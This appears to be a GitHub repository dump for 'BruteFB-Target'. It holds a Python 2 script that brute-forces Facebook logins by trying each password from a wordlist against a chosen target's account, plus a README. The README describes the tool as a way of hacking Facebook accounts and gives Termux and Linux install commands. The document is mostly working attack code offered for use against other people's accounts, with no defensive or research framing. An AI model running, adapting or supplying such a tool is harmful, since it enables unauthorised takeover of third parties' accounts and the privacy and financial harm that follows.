├── BruteTarget.py ├── README.md └── img └── Screenshot_2021-07-09-20-55-50-858_com.termux-picsay.jpg /BruteTarget.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # encoding: utf-8 3 | """ 4 | BruteTarget.py 5 | 6 | Created by AuthenticXploit on 09/07/2021. 7 | Copyright (c) 2021 Copyright Holder. All rights reserved. 8 | """ 9 | 10 | # Import module 11 | try: 12 | import sys 13 | import mechanize 14 | import cookielib 15 | import random 16 | import os 17 | import time 18 | from os import system 19 | from time import sleep 20 | from sys import exit 21 | except ImportError as f: 22 | system("clear") 23 | print("\033[32;1m[\033[31;1m!\033[32;1m] \033[0;33mError \033[31;1m: \033[37;1m{}".format(f)) 24 | 25 | banner = """\033[36;1m 26 | ____ _ _____ ____ 27 | | __ ) _ __ _ _| |_ ___| ___| __ ) 28 | | _ \| '__| | | | __/ _ \ |_ | _ \\\033[1;97m 29 | | |_) | | | |_| | || __/ _| | |_) | 30 | |____/|_| \__,_|\__\___|_| |____/ 31 | 32 | \x1b[1;97m Author \033[31;1m: \033[32mAuthenticXploit 33 | \x1b[1;97m Type \033[31;1m: \033[32mBruteForce 34 | \x1b[1;97m Version \033[31;1m: \033[32m0.3 35 | \x1b[1;97m Contact \033[31;1m: \033[32mhttps://t.me/AuthenticXploit 36 | \x1b[1;97m 37 | """ 38 | 39 | def slowprint(s): 40 | for c in s + '\n': 41 | sys.stdout.write(c) 42 | sys.stdout.flush() 43 | sleep(2.0 / 90) 44 | 45 | system("clear") 46 | slowprint(banner) 47 | email = str(raw_input("\033[37;1minput facebook target \033[31;1m: \033[33;1m")) 48 | passwordlist = str(raw_input("\033[37;1minput wordlist \033[31;1m: \033[33;1m")) 49 | login = 'https://www.facebook.com/login.php?login_attempt=1' 50 | useragents = [('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 51 | 52 | def main(): 53 | try: 54 | global br 55 | br = mechanize.Browser() 56 | cj = cookielib.LWPCookieJar() 57 | br.set_handle_robots(False) 58 | br.set_handle_redirect(True) 59 | br.set_cookiejar(cj) 60 | br.set_handle_equiv(True) 61 | br.set_handle_referer(True) 62 | br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) 63 | menu() 64 | search() 65 | print("\033[32;1m[\033[31;1m!\033[32;1m]\033[33;1m Password does not exist in the wordlist") 66 | except mechanize.URLError: 67 | print("\n\033[32;1m[\033[31;1m!\033[32;1m]\033[33;1m No Connection") 68 | sleep(2) 69 | print("\033[32;1m[\033[31;1m!\033[32;1m] \033[31;1mExit\x1b[0m") 70 | exit() 71 | 72 | def brute(password): 73 | sys.stdout.write("\033[36;1m\r[\033[33;1m-\033[36;1m] \033[37;1mTrying Password \033[31;1m=> \033[33;1m{}\n".format(password)) 74 | sys.stdout.flush() 75 | br.addheaders = [('User-agent', random.choice(useragents))] 76 | site = br.open(login) 77 | br.select_form(nr = 0) 78 | br.form['email'] = email 79 | br.form['pass'] = password 80 | sub = br.submit() 81 | log = sub.geturl() 82 | if log != login and (not 'login_attempt' in log): 83 | print("\033[36;1m[\033[33;1m+\033[36;1m] \033[37;1mPassword Found => \033[32;1m{}".format(password)) 84 | raw_input("\033[31;1mANY KEY to Exit....") 85 | exit(1) 86 | 87 | def search(): 88 | global password 89 | passwords = open(passwordlist,"r") 90 | for password in passwords: 91 | password = password.replace("\n","") 92 | brute(password) 93 | 94 | #menu 95 | def menu(): 96 | try: 97 | total = open(passwordlist,"r") 98 | total = total.readlines() 99 | print(banner) 100 | print "\033[36;1m[\033[31;1m-\033[36;1m] \033[32;1mAccount to crack \033[31;1m> \033[0;33m{}".format(email) 101 | print "\033[36;1m[\033[31;1m-\033[36;1m] \033[32;1mLoaded \033[31;1m>\033[0;33m" , len(total), "passwords" 102 | print("\033[36;1m[\033[31;1m-\033[36;1m] \033[33;1mCracking, please wait ...\n") 103 | except IOError: 104 | print("\n\033[32;1m[\033[31;1m!\033[32;1m]\033[33;1m File wordlist \033[36;1m{} \033[33;1mNot Found\x1b[0m".format(passwordlist)) 105 | exit() 106 | 107 | if __name__ == '__main__': 108 | try: 109 | main() 110 | except(KeyboardInterrupt, EOFError): 111 | print("\033[36;1m\n[\033[31;1m!\033[36;1m]\033[33;1mDetects a forced stop program \x1b[0m") 112 | exit(0) 113 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Brute-FB-Target 2 | Hacking facebook account is targeted by bruteforce method 3 | 4 | # Installations Termux 5 | ``` 6 | $ pkg install python2 7 | $ pip2 install requests mechanize 8 | $ git clone https://github.com/AuthenticXploit/BruteFB-Target 9 | $ cd BruteFB-Target 10 | $ python2 BruteTarget.py 11 | ``` 12 | # Installations linux 13 | ``` 14 | $ sudo apt install git python2 15 | $ pip2 install requests mechanize 16 | $ git clone https://github.com/AuthenticXploit/BruteFB-Target 17 | $ cd BruteFB-Target 18 | $ python2 BruteTarget.py 19 | ``` 20 | # wordlist tools 21 | https://github.com/AuthenticXploit/Wordlist 22 | -------------------------------------------------------------------------------- /img/Screenshot_2021-07-09-20-55-50-858_com.termux-picsay.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AuthenticXploit/BruteFB-Target/bb2e74bacc2908e83befa5ba375fcd61fa9f7ed1/img/Screenshot_2021-07-09-20-55-50-858_com.termux-picsay.jpg --------------------------------------------------------------------------------